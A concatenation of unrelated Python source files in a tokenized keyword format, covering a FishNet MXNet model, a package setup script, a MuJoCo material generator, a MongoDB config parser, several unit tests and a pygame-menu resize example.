"""<def_stmt>__init__ self in_channels out_channels_list bn_use_global_stats **kwargs<block_start>super(SkipUnit self).__init__(**kwargs)<with_stmt>self.name_scope()<block_start>self.blocks=nn.HybridSequential(prefix="")<for_stmt>i,out_channels enumerate(out_channels_list)<block_start>self.blocks.add(FishBlock(in_channels=in_channels out_channels=out_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=out_channels<block_end><block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.blocks(x)<line_sep><return>x<block_end><block_end><class_stmt>SkipAttUnit(HybridBlock)<block_start>"""
FishNet skip connection unit with attention block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels out_channels_list bn_use_global_stats **kwargs<block_start>super(SkipAttUnit self).__init__(**kwargs)<line_sep>mid_channels1=in_channels<floordiv>2<line_sep>mid_channels2=2<times>in_channels<with_stmt>self.name_scope()<block_start>self.conv1=pre_conv1x1_block(in_channels=in_channels out_channels=mid_channels1 bn_use_global_stats=bn_use_global_stats)<line_sep>self.conv2=pre_conv1x1_block(in_channels=mid_channels1 out_channels=mid_channels2 use_bias=<true> bn_use_global_stats=bn_use_global_stats)<line_sep>in_channels=mid_channels2<line_sep>self.se=PreSEAttBlock(in_channels=mid_channels2 out_channels=out_channels_list[-1] bn_use_global_stats=bn_use_global_stats)<line_sep>self.blocks=nn.HybridSequential(prefix="")<for_stmt>i,out_channels enumerate(out_channels_list)<block_start>self.blocks.add(FishBlock(in_channels=in_channels out_channels=out_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=out_channels<block_end><block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.conv1(x)<line_sep>x=self.conv2(x)<line_sep>w=self.se(x)<line_sep>x=self.blocks(x)<line_sep>x=F.broadcast_add(F.broadcast_mul(x w) w)<line_sep><return>x<block_end><block_end><class_stmt>FishFinalBlock(HybridBlock)<block_start>"""
FishNet final block.
Parameters:
----------
in_channels : int
Number of input channels.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels bn_use_global_stats **kwargs<block_start>super(FishFinalBlock self).__init__(**kwargs)<line_sep>mid_channels=in_channels<floordiv>2<with_stmt>self.name_scope()<block_start>self.conv1=pre_conv1x1_block(in_channels=in_channels out_channels=mid_channels bn_use_global_stats=bn_use_global_stats)<line_sep>self.preactiv=PreResActivation(in_channels=mid_channels bn_use_global_stats=bn_use_global_stats)<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.conv1(x)<line_sep>x=self.preactiv(x)<line_sep><return>x<block_end><block_end><class_stmt>FishNet(HybridBlock)<block_start>"""
FishNet model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
direct_channels : list of list of list of int
Number of output channels for each unit along the straight path.
skip_channels : list of list of list of int
Number of output channels for each skip connection unit.
init_block_channels : int
Number of output channels for the initial unit.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
Useful for fine-tuning.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""<def_stmt>__init__ self direct_channels skip_channels init_block_channels bn_use_global_stats=<false> in_channels=3 in_size=(224 224) classes=1000 **kwargs<block_start>super(FishNet self).__init__(**kwargs)<line_sep>self.in_size=in_size<line_sep>self.classes=classes<line_sep>depth=len(direct_channels[0])<line_sep>down1_channels=direct_channels[0]<line_sep>up_channels=direct_channels[1]<line_sep>down2_channels=direct_channels[2]<line_sep>skip1_channels=skip_channels[0]<line_sep>skip2_channels=skip_channels[1]<with_stmt>self.name_scope()<block_start>self.features=nn.HybridSequential(prefix="")<line_sep>self.features.add(SEInitBlock(in_channels=in_channels out_channels=init_block_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=init_block_channels<line_sep>down1_seq=nn.HybridSequential(prefix="")<line_sep>skip1_seq=nn.HybridSequential(prefix="")<for_stmt>i range(depth+1)<block_start>skip1_channels_list=skip1_channels[i]<if_stmt>i<l>depth<block_start>skip1_seq.add(SkipUnit(in_channels=in_channels out_channels_list=skip1_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>down1_channels_list=down1_channels[i]<line_sep>down1_seq.add(DownUnit(in_channels=in_channels out_channels_list=down1_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=down1_channels_list[-1]<block_end><else_stmt><block_start>skip1_seq.add(SkipAttUnit(in_channels=in_channels out_channels_list=skip1_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=skip1_channels_list[-1]<block_end><block_end>up_seq=nn.HybridSequential(prefix="")<line_sep>skip2_seq=nn.HybridSequential(prefix="")<for_stmt>i range(depth+1)<block_start>skip2_channels_list=skip2_channels[i]<if_stmt>i<g>0<block_start>in_channels<augadd>skip1_channels[depth-i][-1]<block_end><if_stmt>i<l>depth<block_start>skip2_seq.add(SkipUnit(in_channels=in_channels out_channels_list=skip2_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>up_channels_list=up_channels[i]<line_sep>dilation=2<power>i<line_sep>up_seq.add(UpUnit(in_channels=in_channels out_channels_list=up_channels_list dilation=dilation bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=up_channels_list[-1]<block_end><else_stmt><block_start>skip2_seq.add(Identity())<block_end><block_end>down2_seq=nn.HybridSequential(prefix="")<for_stmt>i range(depth)<block_start>down2_channels_list=down2_channels[i]<line_sep>down2_seq.add(DownUnit(in_channels=in_channels out_channels_list=down2_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=down2_channels_list[-1]+skip2_channels[depth-1-i][-1]<block_end>self.features.add(SesquialteralHourglass(down1_seq=down1_seq skip1_seq=skip1_seq up_seq=up_seq skip2_seq=skip2_seq down2_seq=down2_seq))<line_sep>self.features.add(FishFinalBlock(in_channels=in_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=in_channels<floordiv>2<line_sep>self.features.add(nn.AvgPool2D(pool_size=7 strides=1))<line_sep>self.output=nn.HybridSequential(prefix="")<line_sep>self.output.add(conv1x1(in_channels=in_channels out_channels=classes use_bias=<true>))<line_sep>self.output.add(nn.Flatten())<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.features(x)<line_sep>x=self.output(x)<line_sep><return>x<block_end><block_end><def_stmt>get_fishnet blocks model_name=<none> pretrained=<false> ctx=cpu() root=os.path.join("~" ".mxnet" "models") **kwargs<block_start>"""
Create FishNet model with specific parameters.
Parameters:
----------
blocks : int
Number of blocks.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
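Notes:
-------
The channel lists below are built by repeating each entry of
`direct_channels_per_layers`/`skip_channels_per_layers` according to the
corresponding layer counts. For example (our reading, blocks=99),
direct_channels[0] becomes [[128, 128], [256, 256], [512, 512, 512, 512, 512, 512]].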
"""<if_stmt>blocks<eq>99<block_start>direct_layers=[[2 2 6] [1 1 1] [1 2 2]]<line_sep>skip_layers=[[1 1 1 2] [4 1 1 0]]<block_end><elif_stmt>blocks<eq>150<block_start>direct_layers=[[2 4 8] [2 2 2] [2 2 4]]<line_sep>skip_layers=[[2 2 2 4] [4 2 2 0]]<block_end><else_stmt><block_start><raise>ValueError("Unsupported FishNet with number of blocks: {}".format(blocks))<block_end>direct_channels_per_layers=[[128 256 512] [512 384 256] [320 832 1600]]<line_sep>skip_channels_per_layers=[[64 128 256 512] [512 768 512 0]]<line_sep>direct_channels=[[[b]<times>c<for>(b c) zip(*a)]<for>a ([(ci li)<for>(ci li) zip(direct_channels_per_layers direct_layers)])]<line_sep>skip_channels=[[[b]<times>c<for>(b c) zip(*a)]<for>a ([(ci li)<for>(ci li) zip(skip_channels_per_layers skip_layers)])]<line_sep>init_block_channels=64<line_sep>net=FishNet(direct_channels=direct_channels skip_channels=skip_channels init_block_channels=init_block_channels **kwargs)<if_stmt>pretrained<block_start><if_stmt>(model_name<is><none>)<or>(<not>model_name)<block_start><raise>ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")<block_end><import_from_stmt>.model_store get_model_file<line_sep>net.load_parameters(filename=get_model_file(model_name=model_name local_model_store_dir_path=root) ctx=ctx)<block_end><return>net<block_end><def_stmt>fishnet99 **kwargs<block_start>"""
FishNet-99 model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""<line_sep><return>get_fishnet(blocks=99 model_name="fishnet99" **kwargs)<block_end><def_stmt>fishnet150 **kwargs<block_start>"""
FishNet-150 model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""<line_sep><return>get_fishnet(blocks=150 model_name="fishnet150" **kwargs)<block_end><def_stmt>_test <block_start><import_stmt>numpy<as>np<import_stmt>mxnet<as>mx<line_sep>pretrained=<false><line_sep>models=[fishnet99 fishnet150 ]<for_stmt>model models<block_start>net=model(pretrained=pretrained)<line_sep>ctx=mx.cpu()<if_stmt><not>pretrained<block_start>net.initialize(ctx=ctx)<block_end># net.hybridize()
net_params=net.collect_params()<line_sep>weight_count=0<for_stmt>param net_params.values()<block_start><if_stmt>(param.shape<is><none>)<or>(<not>param._differentiable)<block_start><continue><block_end>weight_count<augadd>np.prod(param.shape)<block_end>print("m={}, {}".format(model.__name__ weight_count))<assert_stmt>(model<ne>fishnet99<or>weight_count<eq>16628904)<assert_stmt>(model<ne>fishnet150<or>weight_count<eq>24959400)<line_sep>x=mx.nd.zeros((1 3 224 224) ctx=ctx)<line_sep>y=net(x)<assert_stmt>(y.shape<eq>(1 1000))<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>_test()<block_end>
|
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup for DP Learning package."""<import_stmt>os<import_stmt>setuptools<line_sep>here=os.path.dirname(os.path.abspath(__file__))<def_stmt>_parse_requirements path<block_start>"""Parses requirements from file."""<with_stmt>open(os.path.join(here path))<as>f<block_start><return>[line.rstrip()<for>line f]+["dp-accounting"]<block_end><block_end>setuptools.setup(name="dp-learning" author="Google Differential Privacy Team" author_email="<EMAIL>" description="Differential privacy learning algorithms" long_description_content_type="text/markdown" url="https://github.com/google/differential-privacy/" packages=setuptools.find_packages() install_requires=_parse_requirements("requirements.txt") classifiers=["Programming Language :: Python :: 3.7" "Programming Language :: Python :: 3.8" "Programming Language :: Python :: 3.9" "Topic :: Software Development :: Libraries :: Python Modules" ] python_requires=">=3.7" license="Apache 2.0" keywords="differential-privacy clustering" )<line_sep>
|
<import_stmt>numpy<as>np<import_stmt>hashlib<import_from_stmt>collections OrderedDict<import_from_stmt>mujoco_worldgen.objs.obj Obj<import_from_stmt>mujoco_worldgen.util.types store_args<class_stmt>Material(Obj)<block_start>placeable=<false><line_sep>@store_args<def_stmt>__init__ self random=<true> rgba=<none> texture=<none> texture_type=<none> grid_layout=<none> grid_size=<none><block_start>super(Material self).__init__()<block_end><def_stmt>generate self random_state world_params placement_size=<none><block_start><if_stmt><not>world_params.randomize_material<block_start>deterministic_seed=int(hashlib.sha1(self.name.encode()).hexdigest() 16)<line_sep>random_state=np.random.RandomState(deterministic_seed%100000)<block_end>choice=random_state.randint(0 3)<line_sep>self.xml_dict=<none><if_stmt>self.texture<is><not><none><block_start>self.xml_dict=self._material_texture(random_state self.texture self.texture_type self.grid_layout self.grid_size self.rgba)<block_end><elif_stmt>self.rgba<is><not><none><block_start>self.xml_dict=self._material_rgba(random_state self.rgba)<block_end><elif_stmt>self.xml_dict<is><none><block_start>self.xml_dict=[self._material_rgba self._material_checker self._material_random][choice](random_state)<block_end>self.xml_dict=OrderedDict(asset=self.xml_dict)<block_end><def_stmt>generate_xml_dict self<block_start><return>self.xml_dict<block_end><def_stmt>_material_rgba self random_state rgba=<none><block_start>material_attrs=OrderedDict([('@name' self.name) ('@specular' 0.1+0.2<times>random_state.uniform()) ('@shininess' 0.1+0.2<times>random_state.uniform()) ('@reflectance' 0.1+0.2<times>random_state.uniform())])<if_stmt>rgba<is><none><block_start>material_attrs['@rgba']=0.1+0.8<times>random_state.uniform(size=4)<line_sep>material_attrs['@rgba'][3]=1.0<block_end><elif_stmt>isinstance(rgba tuple)<and>len(rgba)<eq>2<block_start>material_attrs['@rgba']=random_state.uniform(rgba[0] rgba[1])<block_end><else_stmt><block_start>material_attrs['@rgba']=rgba<block_end><return>OrderedDict(material=[material_attrs])<block_end><def_stmt>_material_checker self random_state<block_start>texture_attr=OrderedDict([('@name' "texture_"+self.name) ('@builtin' 'checker') ('@height' random_state.randint(5 100)) ('@width' random_state.randint(5 100)) ('@type' '2d') ('@rgb1' [0 0 0])])<line_sep>texture_attr['@rgb2']=0.1+0.8<times>random_state.uniform(size=3)<line_sep>xml_dict=OrderedDict(texture=[texture_attr])<line_sep>texrepeat=[random_state.randint(5 100) random_state.randint(5 100)]<line_sep>xml_dict["material"]=[OrderedDict([('@name' self.name) ('@texrepeat' texrepeat) ('@texture' "texture_"+self.name)])]<line_sep><return>xml_dict<block_end><def_stmt>_material_random self random_state<block_start>random=0.1+0.8<times>random_state.uniform()<line_sep>texture_attr=OrderedDict([('@name' "texture_"+self.name) ('@builtin' 'flat') ('@mark' 'random') ('@type' '2d') ('@height' 2048) ('@width' 2048) ('@rgb1' [1 1 1]) ('@rgb2' [1 1 1]) ('@random' random)])<line_sep>material=OrderedDict([('@name' self.name) ('@texture' "texture_"+self.name)])<line_sep>xml_dict=OrderedDict([('texture' [texture_attr]) ('material' [material])])<line_sep><return>xml_dict<block_end><def_stmt>_material_texture self random_state texture texture_type=<none> grid_layout=<none> grid_size=<none> rgba=<none><block_start>texture_attr=OrderedDict([('@name' "texture_"+self.name) ('@type' '2d') ('@builtin' 'none') ('@file' texture) 
])<if_stmt>texture_type<is><none><block_start>texture_type="cube"<block_end>texture_attr["@type"]=texture_type<if_stmt>texture_type<eq>"cube"<block_start>texture_attr["@gridlayout"]='.U..LFRB.D..'<if>grid_layout<is><none><else>grid_layout<line_sep>texture_attr["@gridsize"]='3 4'<if>grid_size<is><none><else>grid_size<block_end>material=OrderedDict([('@name' self.name) ('@texture' "texture_"+self.name) ])<if_stmt>rgba<is><not><none><block_start>material['@rgba']=rgba<block_end><return>OrderedDict([('texture' [texture_attr]) ('material' [material]) ])<block_end><block_end>
|
"""
MongodbConf - files - Configuration files for MongoDB
=====================================================
This module contains the following files:
``/etc/mongod.conf``,
``/etc/mongodb.conf`` ,
``/etc/opt/rh/rh-mongodb26/mongod.conf``
``/etc/opt/rh/rh-mongodb34/mongod.conf``
They are provided by package mongodb-server, rh-mongodb26-mongodb-server or
rh-mongodb34-mongodb-server.
These MongoDB configuration files may use the **YAML** format
or the standard **key-value pair** format.
Sample input (YAML format)::
systemLog:
destination: file
logAppend: true
path: /var/log/mongodb/mongod.log
# Where and how to store data.
storage:
dbPath: /var/lib/mongo
journal:
enabled: true
Sample input (key-value pair format)::
# mongodb.conf - generated from Puppet
#where to log
logpath=/var/log/mongodb/mongodb.log
logappend=true
# Set this option to configure the mongod or mongos process to bind to and
# listen for connections from applications on this address.
# You may concatenate a list of comma separated values to bind mongod to multiple IP addresses.
bind_ip = 127.0.0.1
# fork and run in background
fork=true
dbpath=/var/lib/mongodb
# location of pidfile
pidfilepath=/var/run/mongodb/mongodb.pid
# Enables journaling
journal = true
# Turn on/off security. Off is currently the default
noauth=true
Examples:
>>> mongod_conf1 = shared[MongodConf]
>>> mongod_conf2 = shared[MongodConf]
>>> mongod_conf1.is_yaml
True
>>> mongod_conf2.is_yaml
False
>>> mongod_conf1.fork
True
>>> mongod_conf2.fork
'true'
>>> mongod_conf1.dbpath
'/var/lib/mongo'
>>> mongod_conf2.dbpath
'/var/lib/mongodb'
>>> mongod_conf1.get("systemLog", {}).get("logAppend")
True
>>> mongod_conf2.get("logappend")
'true'
"""<import_stmt>yaml<import_from_stmt>.. parser Parser LegacyItemAccess get_active_lines<import_from_stmt>..parsers ParseException split_kv_pairs<import_from_stmt>..specs Specs<line_sep>@parser(Specs.mongod_conf)<class_stmt>MongodbConf(Parser LegacyItemAccess)<block_start>"""
Parse the ``/etc/mongod.conf`` config file in key-value pair or YAML format.
Expose several frequently used config options as properties.
Raises:
ParseException: Raised when there is a problem parsing the file content.
Attributes:
is_yaml (boolean): True if this is a yaml format file.
"""<def_stmt>parse_content self content<block_start>a_content=get_active_lines(content)<if_stmt><not>a_content<block_start><raise>ParseException("mongod.conf is empty or all lines are comments")<block_end>self.is_yaml=self._file_type_is_yaml(a_content)<try_stmt><block_start><if_stmt>self.is_yaml<block_start>self.data=yaml.safe_load('\n'.join(content))<block_end><else_stmt><block_start>self.data=split_kv_pairs(content use_partition=<true>)<block_end><block_end><except_stmt>Exception<as>e<block_start><raise>ParseException('mongod conf parse failed: %s' e)<block_end><block_end><def_stmt>_file_type_is_yaml self content<block_start>"""
Return True if the file type is YAML.
Returning False means this file will be handled in key-value pair format.
Why 0.9?
A normal key-value pair format file has the '='
in each line. Use 0.9 rather than 1 here, just in case there are
any unexpected lines with wrong settings.
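For example, with 10 active lines, 9 or more lines containing '=' give a
ratio of at least 0.9 and the file is treated as key-value pairs; a typical
YAML conf contains few or no '=' signs and falls well below the threshold.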
"""<line_sep>cnt=sum([1<for>line content<if>"="<in>line])<line_sep>percent=float(cnt)/len(content)<line_sep><return><true><if>percent<l>0.9<else><false><block_end>@property<def_stmt>bindip self<block_start>"""
Return option value of `net.bindIp` if a yaml conf and `bind_ip` if a
key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('net' {}).get('bindIp')<block_end><else_stmt><block_start><return>self.get('bind_ip')<block_end><block_end>@property<def_stmt>port self<block_start>"""
Return option value of `net.port` if a yaml conf and `port` if a
key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('net' {}).get('port')<block_end><else_stmt><block_start><return>self.get('port')<block_end><block_end>@property<def_stmt>dbpath self<block_start>"""
Return option value of `storage.dbPath` if a yaml conf and `dbPath`
if a key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('storage' {}).get('dbPath')<or>self.get('storage.dbPath')<block_end><else_stmt><block_start><return>self.get('dbpath')<block_end><block_end>@property<def_stmt>fork self<block_start>"""
Return option value of `processManagement.fork` if a yaml conf and
`fork` if a key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('processManagement' {}).get('fork')<block_end><else_stmt><block_start><return>self.get('fork')<block_end><block_end>@property<def_stmt>pidfilepath self<block_start>"""
Return option value of `processManagement.pidFilePath` if a yaml conf
and `pidFilePath` if a key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('processManagement' {}).get('pidFilePath')<block_end><else_stmt><block_start><return>self.get('pidfilepath')<block_end><block_end>@property<def_stmt>syslog self<block_start>"""
Return option value of `systemLog.destination` if a yaml conf; this
can be 'file' or 'syslog'. Return value of `syslog` if a key-value pair
conf, where 'true' means log to syslog.
Returning None means the value is not specified in the configuration file.
"""<if_stmt>self.is_yaml<block_start><return>self.get('systemLog' {}).get('destination')<block_end><else_stmt><block_start><return>self.get('syslog')<block_end><block_end>@property<def_stmt>logpath self<block_start>"""
Return option value of `systemLog.path` if a yaml conf and `logpath`
if a key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('systemLog' {}).get('path')<block_end><else_stmt><block_start><return>self.get('logpath')<block_end><block_end><block_end>
|
<import_from_stmt>unittest TestCase<import_from_stmt>nanoid.resources alphabet<class_stmt>TestURL(TestCase)<block_start><def_stmt>test_has_no_duplicates self<block_start><for_stmt>i range(len(alphabet))<block_start>self.assertEqual(alphabet.rindex(alphabet[i]) i)<block_end><block_end><def_stmt>test_is_string self<block_start>self.assertEqual(type(alphabet) str)<block_end><block_end>
|
<import_stmt>json<import_stmt>mock<import_from_stmt>django.core.urlresolvers reverse<import_from_stmt>ide.utils.cloudpebble_test CloudpebbleTestCase<import_from_stmt>utils.fakes FakeS3<line_sep>__author__='joe'<line_sep>fake_s3=FakeS3()<line_sep>@mock.patch('ide.models.s3file.s3' fake_s3)<class_stmt>TestSource(CloudpebbleTestCase)<block_start>"""Tests for the Tests models"""<def_stmt>setUp self<block_start>self.login()<block_end><def_stmt>create_file self name='file.c' content=<none> target=<none> success=<true><block_start>""" Create a source file """<line_sep>url=reverse('ide:create_source_file' args=[self.project_id])<line_sep>data={}<if_stmt>name<is><not><none><block_start>data['name']=name<block_end><if_stmt>content<is><not><none><block_start>data['content']=content<block_end><if_stmt>target<is><not><none><block_start>data['target']=target<block_end>result=json.loads(self.client.post(url data).content)<line_sep>self.assertEqual(result['success'] success)<if_stmt>success<block_start>self.assertEqual(result['file']['name'] name)<line_sep>self.assertEqual(result['file']['target'] target<if>target<else>'app')<block_end><return>result['file']<if>'file'<in>result<else>result<block_end><def_stmt>load_file self id success=<true><block_start>""" Load a source file's content """<line_sep>url=reverse('ide:load_source_file' args=[self.project_id id])<line_sep>result=json.loads(self.client.get(url).content)<line_sep>self.assertEqual(result['success'] success)<line_sep><return>result<block_end><def_stmt>rename_file self id modified old_name=<none> new_name=<none> success=<true><block_start>""" Rename a source file """<line_sep>url=reverse('ide:rename_source_file' args=[self.project_id id])<line_sep>data={}<if_stmt>old_name<is><not><none><block_start>data['old_name']=old_name<block_end><if_stmt>new_name<is><not><none><block_start>data['new_name']=new_name<block_end><if_stmt>modified<is><not><none><block_start>data['modified']=modified<block_end>result=json.loads(self.client.post(url data).content)<line_sep>self.assertEqual(result['success'] success)<line_sep><return>result<block_end><def_stmt>save_file self id modified content=<none> folded_lines='[]' success=<true><block_start>""" Save new content to a source file """<line_sep>data={}<if_stmt>content<is><not><none><block_start>data['content']=content<block_end><if_stmt>folded_lines<is><not><none><block_start>data['folded_lines']=folded_lines<block_end><if_stmt>modified<is><not><none><block_start>data['modified']=modified<block_end>url=reverse('ide:save_source_file' args=[self.project_id id])<line_sep>result=json.loads(self.client.post(url data).content)<line_sep>self.assertEqual(result['success'] success)<line_sep><return>result<block_end><def_stmt>get_source_names self<block_start>""" Get a list of project source file names """<line_sep>project=json.loads(self.client.get(reverse('ide:project_info' args=[self.project_id])).content)<line_sep><return>{x['name']<for>x project['source_files']}<block_end><def_stmt>test_create self<block_start>""" Test creating files in various valid states """<line_sep>self.create_file("c_file.c")<line_sep>self.create_file("js_file.js")<line_sep>self.create_file("with_content.c" content="blah"<times>100)<line_sep>self.create_file("without_content.c" content=<none>)<line_sep>self.create_file("worker.c" target='worker')<block_end><def_stmt>test_create_load_save self<block_start>""" Test a full sequence of creating, loading, saving and re-loading a file"""<line_sep>content=" Hello world ^^ "<line_sep>new_content="New 
content"<line_sep>info=self.create_file(content=content)<line_sep>loaded=self.load_file(info['id'])<line_sep>self.assertEqual(content loaded['source'])<line_sep>self.save_file(info['id'] int(loaded['modified']) content=new_content)<line_sep>loaded=self.load_file(info['id'])<line_sep>self.assertEqual(new_content loaded['source'])<block_end><def_stmt>test_create_with_invalid_target_throws_error self<block_start>""" Test that attempting to create a file with an invalid target throws an error """<line_sep>self.create_file(target='invalid' success=<false>)<block_end><def_stmt>test_create_with_invalid_names_throws_error self<block_start>""" Check that attempts to create files with invalid names throw errors """<line_sep>self.create_file("no_extension" success=<false>)<line_sep>self.create_file("no_extension" success=<false>)<line_sep>self.create_file("bad_extension.html" success=<false>)<line_sep>self.create_file(".c" success=<false>)<line_sep>self.create_file("`unsafe characters`.c" success=<false>)<block_end><def_stmt>test_rename self<block_start>""" Check that files can be renamed """<line_sep>name1="name1.c"<line_sep>name2="name2.c"<line_sep>info=self.create_file(name1)<line_sep>loaded=self.load_file(info['id'])<line_sep>self.rename_file(info['id'] int(loaded['modified']) name1 name2)<line_sep>self.assertIn(name2 self.get_source_names())<block_end><def_stmt>test_rename_outdated_file_fails self<block_start>""" Check that a file which was modified externally fails to rename """<line_sep>name1="name1.c"<line_sep>name2="name2.c"<line_sep>info=self.create_file(name1)<line_sep>loaded=self.load_file(info['id'])<line_sep>self.rename_file(info['id'] int(loaded['modified']-5000) name1 name2 success=<false>)<line_sep>self.assertIn(name1 self.get_source_names())<block_end><block_end>
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
EXAMPLE - WINDOW RESIZE
Resize the menu when the window is resized.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 <NAME>. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""<import_stmt>pygame<import_stmt>pygame_menu<line_sep>pygame.init()<line_sep>surface=pygame.display.set_mode((600 400) pygame.RESIZABLE)<line_sep>pygame.display.set_caption("Example resizable window")<line_sep>menu=pygame_menu.Menu(height=100 theme=pygame_menu.themes.THEME_BLUE title='Welcome' width=100)<def_stmt>on_resize <arrow><none><block_start>"""
Called whenever the window is resized; rescales the menu to the new window size.
"""<line_sep>window_size=surface.get_size()<line_sep>new_w,new_h=0.75<times>window_size[0] 0.7<times>window_size[1]<line_sep>menu.resize(new_w new_h)<line_sep>print(f'New menu size: {menu.get_size()}')<block_end>menu.add.label('Resize the window!')<line_sep>user_name=menu.add.text_input('Name: ' default='<NAME>' maxchar=10)<line_sep>menu.add.selector('Difficulty: ' [('Hard' 1) ('Easy' 2)])<line_sep>menu.add.button('Quit' pygame_menu.events.EXIT)<line_sep>menu.enable()<line_sep>on_resize()# Set initial size
<if_stmt>__name__<eq>'__main__'<block_start><while_stmt><true><block_start>events=pygame.event.get()<for_stmt>event events<block_start><if_stmt>event.type<eq>pygame.QUIT<block_start>pygame.quit()<line_sep><break><block_end><if_stmt>event.type<eq>pygame.VIDEORESIZE# Update the surface
<block_start>surface=pygame.display.set_mode((event.w event.h) pygame.RESIZABLE)<line_sep># Call the menu event
on_resize()<block_end><block_end># Draw the menu
surface.fill((25 0 50))<line_sep>menu.update(events)<line_sep>menu.draw(surface)<line_sep>pygame.display.flip()<block_end><block_end>
|
<import_stmt>pytest<import_from_stmt>tests.models EmployeeInfo<line_sep>@pytest.mark.asyncio<async_keyword><def_stmt>test_model_counting loaded_database_and_model<block_start>db,Employees=loaded_database_and_model<line_sep>all_employees=<await>Employees.all()<line_sep>employee_count=<await>Employees.count()<line_sep>print(f"Number of Employees is " employee_count)<assert_stmt>employee_count<eq>len(all_employees)<line_sep>employed=<await>Employees.filter(is_employed=<true>)<line_sep>employed_count=<await>Employees.filter(is_employed=<true> count_rows=<true> )<assert_stmt>len(employed)<eq>employed_count<line_sep>un_employed=<await>Employees.filter(is_employed=<false> count_rows=<true>)<assert_stmt>un_employed<eq>0<block_end>
|
